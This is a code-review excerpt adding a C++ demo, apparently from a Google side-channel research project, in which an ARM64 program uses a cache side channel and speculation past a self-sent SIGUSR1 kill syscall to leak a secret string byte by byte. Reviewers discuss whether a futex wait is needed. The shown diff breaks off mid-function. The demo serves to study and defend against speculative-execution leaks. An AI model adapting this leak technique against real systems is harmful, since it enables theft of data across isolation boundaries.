demos/speculation_over_syscall.cc

```diff
@@ -0,0 +1,145 @@
+/*
+ * Copyright 2019 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *   https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef __linux__
+#  error Unsupported OS. Linux required.
+#endif
+
+#ifndef __aarch64__
+#  error Unsupported architecture. ARM64 required.
+#endif
+
+#include <array>
+#include <cstring>
+#include <fstream>
+#include <iostream>
+
+#include <linux/futex.h>
+#include <signal.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+
+const char *public_data = "Hello, world!";
+const char *private_data = "It's a s3kr3t!!!";
+
+// Local handler necessary for avoiding local/global linking mismatches on ARM.
+// When we use extern char[] declaration for a label defined in assembly, the
+// compiler yields this sequence that fails loading the actual address of the
+// label:
+// adrp x0, :got:label
+// ldr x0, [x0, #:got_lo12:label]
+// On the other hand when we use this local handler, the compiler yield this
+// sequence of instructions:
+// adrp x0, label
+// add x0, x0, :lo12:label
+// and that works correctly because it if an effective equivalent of
+// adr x0, label.
+static void local_handler() {
+  asm volatile("b afterspeculation");
+}
+
+static char leak_byte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  for (int run = 0;; ++run) {
+    size_t safe_offset = run % strlen(public_data);
+    sidechannel.FlushOracle();
+
+    // Architecturally access the safe offset.
+    ForceRead(isolated_oracle.data() + static_cast<size_t>(data[safe_offset]));
+
+    // Sends a SIGUSR1 signal to itself. The signal handler shifts the control
+    // flow to the "afterspeculation" label.
+    asm volatile(
+        "mov x8, %0\n"
+        "mov x0, %1\n"
+        "mov x1, %2\n"
+        "svc #0\n"::"r"(__NR_kill), "r"(getpid()), "r"(SIGUSR1));
+
+    int value = 0;
+
+    // Waits indefinitely until the value changes which never happens.
+    asm volatile(
```

Comment:
(sorry if I'm catching you mid-change here)

Why do we need the futex?

Reply:
In case the signal is not sent synchronously. Or it is ensured that the receiver signal handler is invoked strictly before the sender __NR_kill syscall returns?

Reply:
http://man7.org/linux/man-pages/man2/kill.2.html

>POSIX.1 requires that if a process sends a signal to itself, and the
sending thread does not have the signal blocked, and no other thread
has it unblocked or is waiting for it in sigwait(3), at least one
unblocked signal must be delivered to the sending thread before the
kill() returns.

Reply:
Removed.